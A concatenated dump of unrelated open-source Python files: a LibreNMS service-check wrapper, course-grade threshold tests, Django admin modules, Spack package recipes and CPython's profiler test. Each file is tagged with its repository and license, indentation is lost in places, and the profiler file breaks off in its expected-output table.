install_dir = os.path.dirname(os.path.realpath(__file__))
LNMS.check_for_file(install_dir + "/.env")
config = json.loads(LNMS.get_config_data(install_dir))
service_path = config["install_dir"] + "/check-services.php"
log_dir = config["log_dir"]
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC1
if "distributed_poller_group" in config:
service_group = str(config["distributed_poller_group"])
else:
service_group = False
if (
"distributed_poller" in config
and "distributed_poller_memcached_host" in config
and "distributed_poller_memcached_port" in config
and config["distributed_poller"]
):
try:
import memcache
import uuid
memc = memcache.Client(
[
config["distributed_poller_memcached_host"]
+ ":"
+ str(config["distributed_poller_memcached_port"])
]
)
if str(memc.get("service.master")) == config["distributed_poller_name"]:
print("This system is already joined as the service master.")
sys.exit(2)
if memc_alive():
if memc.get("service.master") is None:
print("Registered as Master")
memc.set("service.master", config["distributed_poller_name"], 10)
memc.set("service.nodes", 0, 300)
IsNode = False
else:
print(
"Registered as Node joining Master %s"
% memc.get("service.master")
)
IsNode = True
memc.incr("service.nodes")
servicedisco = True
else:
print(
"Could not connect to memcached, disabling distributed service checks."
)
servicedisco = False
IsNode = False
except SystemExit:
raise
except ImportError:
print("ERROR: missing memcache python module:")
print("On deb systems: apt-get install python3-memcache")
print("On other systems: pip3 install python-memcached")
print("Disabling distributed discovery.")
servicedisco = False
else:
servicedisco = False
# EOC1
s_time = time.time()
real_duration = 0
per_device_duration = {}
service_devices = 0
"""
    Take the number of threads we want to run in parallel from the command line;
    if none is given or the argument is garbage, fall back to a default of 1
    """
    usage = "usage: %prog [options] <workers> (default: 1; do not set too high)"
description = "Spawn multiple check-services.php processes in parallel."
parser = OptionParser(usage=usage, description=description)
parser.add_option(
"-d",
"--debug",
action="store_true",
default=False,
help="Enable debug output. WARNING: Leaving this enabled will consume a lot of disk space.",
)
(options, args) = parser.parse_args()
debug = options.debug
try:
amount_of_workers = int(args[0])
except (IndexError, ValueError):
amount_of_workers = 1
devices_list = []
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC2
if service_group is not False:
query = (
"SELECT DISTINCT(`services`.`device_id`) FROM `services` LEFT JOIN `devices` ON `services`.`device_id` = `devices`.`device_id` WHERE `devices`.`poller_group` IN("
+ service_group
+ ") AND `devices`.`disabled` = 0"
)
else:
query = "SELECT DISTINCT(`services`.`device_id`) FROM `services` LEFT JOIN `devices` ON `services`.`device_id` = `devices`.`device_id` WHERE `devices`.`disabled` = 0"
# EOC2
db = LNMS.db_open(
config["db_socket"],
config["db_host"],
config["db_port"],
config["db_user"],
config["db_pass"],
config["db_name"],
)
cursor = db.cursor()
cursor.execute(query)
devices = cursor.fetchall()
for row in devices:
devices_list.append(int(row[0]))
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC3
if servicedisco and not IsNode:
query = "SELECT MAX(`device_id`), MIN(`device_id`) FROM `services`"
cursor.execute(query)
devices = cursor.fetchall()
maxlocks = devices[0][0] or 0
minlocks = devices[0][1] or 0
# EOC3
db.close()
poll_queue = queue.Queue()
print_queue = queue.Queue()
print(
"INFO: starting the service check at %s with %s threads"
% (time.strftime("%Y-%m-%d %H:%M:%S"), amount_of_workers)
)
for device_id in devices_list:
poll_queue.put(device_id)
for i in range(amount_of_workers):
t = threading.Thread(target=poll_worker)
        t.daemon = True
t.start()
p = threading.Thread(target=printworker)
    p.daemon = True
p.start()
try:
poll_queue.join()
print_queue.join()
except (KeyboardInterrupt, SystemExit):
raise
total_time = int(time.time() - s_time)
print(
"INFO: services-wrapper checked %s devices in %s seconds with %s workers"
% (service_devices, total_time, amount_of_workers)
)
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC6
if servicedisco or memc_alive():
master = memc.get("service.master")
if master == config["distributed_poller_name"] and not IsNode:
print("Wait for all service-nodes to finish")
nodes = memc.get("service.nodes")
while nodes is not None and nodes > 0:
try:
time.sleep(1)
nodes = memc.get("service.nodes")
except:
pass
print("Clearing Locks")
x = minlocks
while x <= maxlocks:
memc.delete("service.device." + str(x))
x = x + 1
print("%s Locks Cleared" % x)
print("Clearing Nodes")
memc.delete("service.master")
memc.delete("service.nodes")
else:
memc.decr("service.nodes")
print("Finished %s." % time.time())
# EOC6
show_stopper = False
if total_time > 300:
print(
"WARNING: the process took more than 5 minutes to finish, you need faster hardware or more threads"
)
print(
"INFO: in sequential style service checks the elapsed time would have been: %s seconds"
% real_duration
)
for device in per_device_duration:
if per_device_duration[device] > 300:
print(
"WARNING: device %s is taking too long: %s seconds"
% (device, per_device_duration[device])
)
show_stopper = True
if show_stopper:
print(
"ERROR: Some devices are taking more than 300 seconds, the script cannot recommend you what to do."
)
else:
recommend = int(total_time / 300.0 * amount_of_workers + 1)
print(
"WARNING: Consider setting a minimum of %d threads. (This does not constitute professional advice!)"
% recommend
)
sys.exit(2)
| rasssta/librenms | services-wrapper.py | Python | gpl-3.0 | 14,784 |
from lib.testdata import CourseTestCase
from exercise.cache.content import CachedContent
from exercise.cache.points import CachedPoints
from .models import Threshold
class ThresholdTest(CourseTestCase):
class MockCachedPoints:
def __init__(self, total_data):
self.data = total_data
def total(self):
return self.data
GRADE_0 = MockCachedPoints({
'points':8,
'points_by_difficulty':{'A':1500,'B':200},
'unconfirmed_points_by_difficulty':{'A':200,'B':200},
})
GRADE_1 = MockCachedPoints({
'points':10,
'points_by_difficulty':{'A':1800}
})
GRADE_2 = MockCachedPoints({
'points':25,
'points_by_difficulty':{'A':1900,'B':500}
})
GRADE_3 = MockCachedPoints({
'points':39,
'points_by_difficulty':{'A':1900,'B':875,'C':349}
})
GRADE_4 = MockCachedPoints({
'points':48,
'points_by_difficulty':{'A':1800,'B':775,'C':550}
})
GRADE_5 = MockCachedPoints({
'points':100,
'points_by_difficulty':{'A':1700,'B':0,'C':1775}
})
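    # Reading the fixtures (sketch): GRADE_1 passes threshold "1" because its
    # 1800 A-difficulty points meet the A >= 1800 limit created in
    # _create_difficulty_thresholds below, but misses "2" (needs A >= 1900).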
def setUp(self):
self.setUpCourse()
self.setUpSubmissions()
self.grades = list([
Threshold.objects.create(course_instance=self.instance, name=name)
for name in ["1", "2", "3", "4", "5"]
])
def _create_difficulty_thresholds(self):
self.grades[0].points.create(limit=1800, difficulty="A", order=1)
self.grades[0].points.create(limit=0, difficulty="B", order=2)
self.grades[0].points.create(limit=0, difficulty="C", order=3)
self.grades[1].points.create(limit=1900, difficulty="A", order=1)
self.grades[1].points.create(limit=400, difficulty="B", order=2)
self.grades[1].points.create(limit=0, difficulty="C", order=3)
self.grades[2].points.create(limit=1900, difficulty="A", order=1)
self.grades[2].points.create(limit=875, difficulty="B", order=2)
self.grades[2].points.create(limit=0, difficulty="C", order=3)
self.grades[3].points.create(limit=1900, difficulty="A", order=1)
self.grades[3].points.create(limit=875, difficulty="B", order=2)
self.grades[3].points.create(limit=350, difficulty="C", order=3)
self.grades[4].points.create(limit=1900, difficulty="A", order=1)
self.grades[4].points.create(limit=875, difficulty="B", order=2)
self.grades[4].points.create(limit=600, difficulty="C", order=3)
def test_normal_points(self):
self.grades[0].points.create(limit=10)
self.grades[1].points.create(limit=20)
self.grades[2].points.create(limit=30)
self.grades[3].points.create(limit=40)
self.grades[4].points.create(limit=50)
self.grades[3].consume_harder_points = True
self.grades[3].save()
self.assertFalse(self.grades[0].is_passed(self.GRADE_0))
self.assertFalse(self.grades[4].is_passed(self.GRADE_0))
self.assertTrue(self.grades[0].is_passed(self.GRADE_1))
self.assertFalse(self.grades[1].is_passed(self.GRADE_1))
self.assertTrue(self.grades[0].is_passed(self.GRADE_2))
self.assertTrue(self.grades[1].is_passed(self.GRADE_2))
self.assertFalse(self.grades[2].is_passed(self.GRADE_2))
self.assertTrue(self.grades[2].is_passed(self.GRADE_3))
self.assertFalse(self.grades[3].is_passed(self.GRADE_3))
self.assertTrue(self.grades[3].is_passed(self.GRADE_4))
self.assertFalse(self.grades[4].is_passed(self.GRADE_4))
self.assertTrue(self.grades[4].is_passed(self.GRADE_5))
self.assertTrue(self.grades[3].is_passed(self.GRADE_5))
def test_difficulty_points(self):
self._create_difficulty_thresholds()
self.assertFalse(self.grades[0].is_passed(self.GRADE_0))
self.assertFalse(self.grades[4].is_passed(self.GRADE_0))
self.assertTrue(self.grades[0].is_passed(self.GRADE_1))
self.assertFalse(self.grades[1].is_passed(self.GRADE_1))
self.assertTrue(self.grades[0].is_passed(self.GRADE_2))
self.assertTrue(self.grades[1].is_passed(self.GRADE_2))
self.assertFalse(self.grades[2].is_passed(self.GRADE_2))
self.assertTrue(self.grades[2].is_passed(self.GRADE_3))
self.assertFalse(self.grades[3].is_passed(self.GRADE_3))
self.assertTrue(self.grades[0].is_passed(self.GRADE_4))
self.assertFalse(self.grades[1].is_passed(self.GRADE_4))
self.assertFalse(self.grades[2].is_passed(self.GRADE_4))
self.assertFalse(self.grades[3].is_passed(self.GRADE_4))
self.assertFalse(self.grades[4].is_passed(self.GRADE_4))
self.assertFalse(self.grades[0].is_passed(self.GRADE_5))
self.assertFalse(self.grades[1].is_passed(self.GRADE_5))
self.assertFalse(self.grades[2].is_passed(self.GRADE_5))
self.assertFalse(self.grades[3].is_passed(self.GRADE_5))
self.assertFalse(self.grades[4].is_passed(self.GRADE_5))
def test_difficulty_points_consumed(self):
self._create_difficulty_thresholds()
for t in self.grades:
t.consume_harder_points = True
t.save()
self.assertFalse(self.grades[0].is_passed(self.GRADE_0))
self.assertFalse(self.grades[4].is_passed(self.GRADE_0))
self.assertTrue(self.grades[0].is_passed(self.GRADE_1))
self.assertFalse(self.grades[1].is_passed(self.GRADE_1))
self.assertTrue(self.grades[0].is_passed(self.GRADE_2))
self.assertTrue(self.grades[1].is_passed(self.GRADE_2))
self.assertFalse(self.grades[2].is_passed(self.GRADE_2))
self.assertTrue(self.grades[2].is_passed(self.GRADE_3))
self.assertFalse(self.grades[3].is_passed(self.GRADE_3))
self.assertTrue(self.grades[3].is_passed(self.GRADE_4))
self.assertFalse(self.grades[4].is_passed(self.GRADE_4))
self.assertTrue(self.grades[4].is_passed(self.GRADE_5))
self.assertTrue(self.grades[3].is_passed(self.GRADE_5))
self.assertTrue(self.grades[0].is_passed(self.GRADE_0, True))
self.assertFalse(self.grades[1].is_passed(self.GRADE_0, True))
def test_pass(self):
content = CachedContent(self.instance)
points = CachedPoints(self.instance, self.student, content)
t = Threshold.objects.create(course_instance=self.instance, name="test")
t.passed_categories.add(self.category)
self.assertTrue(t.is_passed(points))
t.passed_exercises.add(self.exercise)
self.assertTrue(t.is_passed(points))
t.passed_exercises.add(self.exercise2)
self.assertFalse(t.is_passed(points))
t.passed_exercises.clear()
t.passed_modules.add(self.module)
self.assertFalse(t.is_passed(points))
self.submission3.set_points(2,2)
self.submission3.set_ready()
self.submission3.save()
points = CachedPoints(self.instance, self.student, content)
self.assertTrue(t.is_passed(points))
| teemulehtinen/a-plus | threshold/tests.py | Python | gpl-3.0 | 7,011 |
#
# Newfies-Dialer License
# http://www.newfies-dialer.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2013 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <[email protected]>
#
from django.contrib import admin
from django.contrib import messages
from django.conf.urls import patterns
from django.utils.translation import ugettext as _
from django.db.models import Count
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template.context import RequestContext
from dialer_campaign.models import Campaign, Subscriber
from dialer_campaign.function_def import check_dialer_setting, dialer_setting_limit
from dialer_campaign.constants import SUBSCRIBER_STATUS, SUBSCRIBER_STATUS_NAME
from dialer_campaign.forms import SubscriberReportForm
from genericadmin.admin import GenericAdminModelAdmin
from common.common_functions import variable_value, ceil_strdate
from common.app_label_renamer import AppLabelRenamer
from datetime import datetime
APP_LABEL = _('Dialer Campaign')
AppLabelRenamer(native_app_label=u'dialer_campaign', app_label=APP_LABEL).main()
class CampaignAdmin(GenericAdminModelAdmin):
"""
Allows the administrator to view and modify certain attributes
of a Campaign.
"""
content_type_whitelist = ('survey/survey_template', )
fieldsets = (
(_('standard options').capitalize(), {
'fields': ('campaign_code', 'name', 'description', 'callerid',
'user', 'status', 'startingdate', 'expirationdate',
'aleg_gateway', 'content_type', 'object_id',
'extra_data', 'phonebook', 'voicemail', 'amd_behavior',
'voicemail_audiofile'
),
}),
(_('advanced options').capitalize(), {
'classes': ('collapse',),
'fields': ('frequency', 'callmaxduration', 'maxretry',
'intervalretry', 'calltimeout', 'imported_phonebook',
'daily_start_time', 'daily_stop_time',
'monday', 'tuesday', 'wednesday',
'thursday', 'friday', 'saturday', 'sunday',
'completion_maxretry', 'completion_intervalretry', 'dnc')
}),
)
list_display = ('id', 'name', 'content_type', 'campaign_code', 'user',
'startingdate', 'expirationdate', 'frequency',
'callmaxduration', 'maxretry', 'aleg_gateway', 'status',
'update_campaign_status', 'totalcontact', 'completed',
'subscriber_detail', 'progress_bar')
list_display_links = ('id', 'name', )
    # list_filter doesn't display correctly when there are too many
    # elements in list_display
    # list_filter = ['user', 'status', 'created_date']
ordering = ('-id', )
filter_horizontal = ('phonebook',)
def get_urls(self):
urls = super(CampaignAdmin, self).get_urls()
my_urls = patterns('',
(r'^$', self.admin_site.admin_view(self.changelist_view)),
(r'^add/$', self.admin_site.admin_view(self.add_view)),
)
return my_urls + urls
def add_view(self, request, extra_context=None):
"""
Override django add_view method for checking the dialer setting limit
**Logic Description**:
* Before adding campaign, check dialer setting limit if applicable
to the user, if matched then the user will be redirected to
the campaign list
"""
# Check dialer setting limit
# check Max Number of running campaigns
if check_dialer_setting(request, check_for="campaign"):
msg = _("you have too many campaigns. max allowed %(limit)s") \
% {'limit':
dialer_setting_limit(request, limit_for="campaign")}
messages.error(request, msg)
return HttpResponseRedirect(
reverse("admin:dialer_campaign_campaign_changelist"))
ctx = {}
return super(CampaignAdmin, self).add_view(request, extra_context=ctx)
admin.site.register(Campaign, CampaignAdmin)
class SubscriberAdmin(admin.ModelAdmin):
"""Allows the administrator to view and modify certain attributes
of a Subscriber."""
list_display = ('id', 'contact', 'campaign',
'last_attempt', 'count_attempt', 'completion_count_attempt', 'duplicate_contact',
'contact_name', 'status', 'created_date')
list_filter = ['campaign', 'status', 'created_date', 'last_attempt']
ordering = ('-id', )
raw_id_fields = ("contact",)
def get_urls(self):
urls = super(SubscriberAdmin, self).get_urls()
my_urls = patterns('',
(r'^subscriber_report/$', self.admin_site.admin_view(self.subscriber_report)),
)
return my_urls + urls
def subscriber_report(self, request):
"""
Get subscriber report
**Attributes**:
* ``form`` - SubscriberReportForm
* ``template`` - admin/dialer_campaign/subscriber/subscriber_report.html
"""
opts = Subscriber._meta
tday = datetime.today()
form = SubscriberReportForm(initial={"from_date": tday.strftime("%Y-%m-%d"),
"to_date": tday.strftime("%Y-%m-%d")})
total_subscriber = 0
total_pending = 0
total_pause = 0
total_abort = 0
total_fail = 0
total_sent = 0
total_in_process = 0
total_not_auth = 0
total_completed = 0
if request.method == 'POST':
form = SubscriberReportForm(request.POST)
if form.is_valid():
start_date = ''
end_date = ''
if request.POST.get('from_date'):
from_date = request.POST.get('from_date')
start_date = ceil_strdate(from_date, 'start')
if request.POST.get('to_date'):
to_date = request.POST.get('to_date')
end_date = ceil_strdate(to_date, 'end')
campaign_id = variable_value(request, 'campaign_id')
kwargs = {}
if start_date and end_date:
kwargs['updated_date__range'] = (start_date, end_date)
if start_date and end_date == '':
kwargs['updated_date__gte'] = start_date
if start_date == '' and end_date:
kwargs['updated_date__lte'] = end_date
if campaign_id and campaign_id != '0':
kwargs['campaign_id'] = campaign_id
select_data = {"updated_date": "SUBSTR(CAST(updated_date as CHAR(30)),1,10)"}
subscriber = Subscriber.objects\
.filter(**kwargs)\
.extra(select=select_data)\
.values('updated_date', 'status')\
.annotate(Count('updated_date'))\
.order_by('updated_date')
for i in subscriber:
total_subscriber += i['updated_date__count']
if i['status'] == SUBSCRIBER_STATUS.PENDING:
total_pending += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.PAUSE:
total_pause += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.ABORT:
total_abort += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.FAIL:
total_fail += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.SENT:
total_sent += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.IN_PROCESS:
total_in_process += i['updated_date__count']
elif i['status'] == SUBSCRIBER_STATUS.NOT_AUTHORIZED:
total_not_auth += i['updated_date__count']
else:
#status COMPLETED
total_completed += i['updated_date__count']
ctx = RequestContext(request, {
'form': form,
'opts': opts,
'total_subscriber': total_subscriber,
'total_pending': total_pending,
'total_pause': total_pause,
'total_abort': total_abort,
'total_fail': total_fail,
'total_sent': total_sent,
'total_in_process': total_in_process,
'total_not_auth': total_not_auth,
'total_completed': total_completed,
'SUBSCRIBER_STATUS_NAME': SUBSCRIBER_STATUS_NAME,
'model_name': opts.object_name.lower(),
'app_label': APP_LABEL,
'title': _('subscriber report'),
})
return render_to_response('admin/dialer_campaign/subscriber/subscriber_report.html',
context_instance=ctx)
admin.site.register(Subscriber, SubscriberAdmin)
| garyjs/Newfiesautodialer | newfies/dialer_campaign/admin.py | Python | mpl-2.0 | 9,353 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2011-2013 Serpent Consulting Services Pvt. Ltd. (<http://serpentcs.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import table_designer | ovnicraft/openerp-restaurant | poi_pos_table_designer/controllers/__init__.py | Python | agpl-3.0 | 1,093 |
"""
Django admin dashboard configuration.
"""
from config_models.admin import ConfigurationModelAdmin, KeyedConfigurationModelAdmin
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from common.djangoapps.xblock_django.models import XBlockConfiguration, XBlockStudioConfiguration, XBlockStudioConfigurationFlag # lint-amnesty, pylint: disable=line-too-long
class XBlockConfigurationAdmin(KeyedConfigurationModelAdmin):
"""
Admin for XBlockConfiguration.
"""
fieldsets = (
('XBlock Name', {
'fields': ('name',)
}),
('Enable/Disable XBlock', {
'description': _('To disable the XBlock and prevent rendering in the LMS, leave "Enabled" deselected; '
'for clarity, update XBlockStudioConfiguration support state accordingly.'),
'fields': ('enabled',)
}),
('Deprecate XBlock', {
'description': _("Only XBlocks listed in a course's Advanced Module List can be flagged as deprecated. "
"Remember to update XBlockStudioConfiguration support state accordingly, as deprecated "
"does not impact whether or not new XBlock instances can be created in Studio."),
'fields': ('deprecated',)
}),
)
class XBlockStudioConfigurationAdmin(KeyedConfigurationModelAdmin):
"""
Admin for XBlockStudioConfiguration.
"""
fieldsets = (
('', {
'fields': ('name', 'template')
}),
('Enable Studio Authoring', {
'description': _(
'XBlock/template combinations that are disabled cannot be edited in Studio, regardless of support '
'level. Remember to also check if all instances of the XBlock are disabled in XBlockConfiguration.'
),
'fields': ('enabled',)
}),
('Support Level', {
'description': _(
"Enabled XBlock/template combinations with full or provisional support can always be created "
"in Studio. Unsupported XBlock/template combinations require course author opt-in."
),
'fields': ('support_level',)
}),
)
admin.site.register(XBlockConfiguration, XBlockConfigurationAdmin)
admin.site.register(XBlockStudioConfiguration, XBlockStudioConfigurationAdmin)
admin.site.register(XBlockStudioConfigurationFlag, ConfigurationModelAdmin)
| eduNEXT/edunext-platform | common/djangoapps/xblock_django/admin.py | Python | agpl-3.0 | 2,485 |
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('grades.exceptions', 'lms.djangoapps.grades.exceptions')
from lms.djangoapps.grades.exceptions import *
| eduNEXT/edunext-platform | import_shims/lms/grades/exceptions.py | Python | agpl-3.0 | 374 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RLeaflet(RPackage):
"""Create and customize interactive maps using the 'Leaflet' JavaScript
library and the 'htmlwidgets' package. These maps can be used directly from
the R console, from 'RStudio', in Shiny apps and R Markdown documents."""
homepage = "http://rstudio.github.io/leaflet/"
url = "https://cran.r-project.org/src/contrib/leaflet_1.0.1.tar.gz"
version('1.0.1', '7f3d8b17092604d87d4eeb579f73d5df')
depends_on('r-base64enc', type=('build', 'run'))
depends_on('r-htmlwidgets', type=('build', 'run'))
depends_on('r-htmltools', type=('build', 'run'))
depends_on('r-magrittr', type=('build', 'run'))
depends_on('r-markdown', type=('build', 'run'))
depends_on('r-png', type=('build', 'run'))
depends_on('r-rcolorbrewer', type=('build', 'run'))
depends_on('r-raster', type=('build', 'run'))
depends_on('r-scales', type=('build', 'run'))
depends_on('r-sp', type=('build', 'run'))
| TheTimmy/spack | var/spack/repos/builtin/packages/r-leaflet/package.py | Python | lgpl-2.1 | 2,218 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Saws(AutotoolsPackage):
"""The Scientific Application Web server (SAWs) turns any C or C++
scientific or engineering application code into a webserver,
allowing one to examine (and even modify) the state of the
simulation with any browser from anywhere."""
homepage = "https://bitbucket.org/saws/saws/wiki/Home"
version('develop', git='https://bitbucket.org/saws/saws.git', tag='master')
version('0.1.0', git='https://bitbucket.org/saws/saws.git', tag='v0.1.0')
| TheTimmy/spack | var/spack/repos/builtin/packages/saws/package.py | Python | lgpl-2.1 | 1,762 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RGdsfmt(RPackage):
"""R Interface to CoreArray Genomic Data Structure (GDS) Files.
This package provides a high-level R interface to CoreArray Genomic Data
Structure (GDS) data files, which are portable across platforms with
hierarchical structure to store multiple scalable array-oriented data
sets with metadata information. It is suited for large-scale datasets,
especially for data which are much larger than the available random-
access memory. The gdsfmt package offers the efficient operations
specifically designed for integers of less than 8 bits, since a diploid
genotype, like single-nucleotide polymorphism (SNP), usually occupies
fewer bits than a byte. Data compression and decompression are available
with relatively efficient random access. It is also allowed to read a
GDS file in parallel with multiple R processes supported by the package
parallel."""
homepage = "https://bioconductor.org/packages/gdsfmt"
git = "https://git.bioconductor.org/packages/gdsfmt.git"
version('1.20.0', commit='b1fbaba0a5ace3dc45daecc85168651cd85dce00')
version('1.18.1', commit='b911b953e9db7988e93ec2010b0ab1e384d073c9')
version('1.16.0', commit='49b011452585e432b983b68466a230c9b71d8a95')
version('1.14.1', commit='15743647b7eea5b82d3284858b4591fb6e59959d')
version('1.12.0', commit='d705a95b0bea7be2a2b37e939f45017337ba0fb6')
depends_on('[email protected]:', type=('build', 'run'))
| iulian787/spack | var/spack/repos/builtin/packages/r-gdsfmt/package.py | Python | lgpl-2.1 | 1,729 |
"""Test suite for the profile module."""
import sys
import pstats
import unittest
from difflib import unified_diff
from io import StringIO
from test.support import run_unittest
import profile
from test.profilee import testfunc, timer
class ProfileTest(unittest.TestCase):
profilerclass = profile.Profile
methodnames = ['print_stats', 'print_callers', 'print_callees']
expected_max_output = ':0(max)'
def get_expected_output(self):
return _ProfileOutput
@classmethod
def do_profiling(cls):
results = []
prof = cls.profilerclass(timer, 0.001)
start_timer = timer()
prof.runctx("testfunc()", globals(), locals())
results.append(timer() - start_timer)
for methodname in cls.methodnames:
s = StringIO()
stats = pstats.Stats(prof, stream=s)
stats.strip_dirs().sort_stats("stdname")
getattr(stats, methodname)()
output = s.getvalue().splitlines()
mod_name = testfunc.__module__.rsplit('.', 1)[1]
# Only compare against stats originating from the test file.
# Prevents outside code (e.g., the io module) from causing
# unexpected output.
output = [line.rstrip() for line in output if mod_name in line]
results.append('\n'.join(output))
return results
def test_cprofile(self):
results = self.do_profiling()
expected = self.get_expected_output()
self.assertEqual(results[0], 1000)
for i, method in enumerate(self.methodnames):
if results[i+1] != expected[method]:
print("Stats.%s output for %s doesn't fit expectation!" %
(method, self.profilerclass.__name__))
print('\n'.join(unified_diff(
results[i+1].split('\n'),
expected[method].split('\n'))))
def test_calling_conventions(self):
# Issue #5330: profile and cProfile wouldn't report C functions called
# with keyword arguments. We test all calling conventions.
stmts = [
"max([0])",
"max([0], key=int)",
"max([0], **dict(key=int))",
"max(*([0],))",
"max(*([0],), key=int)",
"max(*([0],), **dict(key=int))",
]
for stmt in stmts:
s = StringIO()
prof = self.profilerclass(timer, 0.001)
prof.runctx(stmt, globals(), locals())
stats = pstats.Stats(prof, stream=s)
stats.print_stats()
res = s.getvalue()
self.assertIn(self.expected_max_output, res,
"Profiling {0!r} didn't report max:\n{1}".format(stmt, res))
def regenerate_expected_output(filename, cls):
filename = filename.rstrip('co')
print('Regenerating %s...' % filename)
results = cls.do_profiling()
newfile = []
with open(filename, 'r') as f:
for line in f:
newfile.append(line)
if line.startswith('#--cut'):
break
with open(filename, 'w') as f:
f.writelines(newfile)
f.write("_ProfileOutput = {}\n")
for i, method in enumerate(cls.methodnames):
f.write('_ProfileOutput[%r] = """\\\n%s"""\n' % (
method, results[i+1]))
f.write('\nif __name__ == "__main__":\n main()\n')
def test_main():
run_unittest(ProfileTest)
def main():
if '-r' not in sys.argv:
test_main()
else:
regenerate_expected_output(__file__, ProfileTest)
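# Usage note (sketch): running this file directly executes the tests, while
# "python test_profile.py -r" re-profiles and regenerates the expected-output
# tables that follow the cut line below.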
# Don't remove this comment. Everything below it is auto-generated.
#--cut--------------------------------------------------------------------------
_ProfileOutput = {}
_ProfileOutput['print_stats'] = """\
28 27.972 0.999 27.972 0.999 profilee.py:110(__getattr__)
1 269.996 269.996 999.769 999.769 profilee.py:25(testfunc)
23/3 149.937 6.519 169.917 56.639 profilee.py:35(factorial)
20 19.980 0.999 19.980 0.999 profilee.py:48(mul)
2 39.986 19.993 599.830 299.915 profilee.py:55(helper)
4 115.984 28.996 119.964 29.991 profilee.py:73(helper1)
2 -0.006 -0.003 139.946 69.973 profilee.py:84(helper2_indirect)
8 311.976 38.997 399.912 49.989 profilee.py:88(helper2)
8 63.976 7.997 79.960 9.995 profilee.py:98(subhelper)"""
_ProfileOutput['print_callers'] = """\
:0(append) <- profilee.py:73(helper1)(4) 119.964
:0(exc_info) <- profilee.py:73(helper1)(4) 119.964
:0(hasattr) <- profilee.py:73(helper1)(4) 119.964
profilee.py:88(helper2)(8) 399.912
profilee.py:110(__getattr__) <- :0(hasattr)(12) 11.964
profilee.py:98(subhelper)(16) 79.960
profilee.py:25(testfunc) <- <string>:1(<module>)(1) 999.767
profilee.py:35(factorial) <- profilee.py:25(testfunc)(1) 999.769
profilee.py:35(factorial)(20) 169.917
profilee.py:84(helper2_indirect)(2) 139.946
profilee.py:48(mul) <- profilee.py:35(factorial)(20) 169.917
profilee.py:55(helper) <- profilee.py:25(testfunc)(2) 999.769
profilee.py:73(helper1) <- profilee.py:55(helper)(4) 599.830
profilee.py:84(helper2_indirect) <- profilee.py:55(helper)(2) 599.830
profilee.py:88(helper2) <- profilee.py:55(helper)(6) 599.830
profilee.py:84(helper2_indirect)(2) 139.946
profilee.py:98(subhelper) <- profilee.py:88(helper2)(8) 399.912"""
_ProfileOutput['print_callees'] = """\
:0(hasattr) -> profilee.py:110(__getattr__)(12) 27.972
<string>:1(<module>) -> profilee.py:25(testfunc)(1) 999.769
profilee.py:110(__getattr__) ->
profilee.py:25(testfunc) -> profilee.py:35(factorial)(1) 169.917
profilee.py:55(helper)(2) 599.830
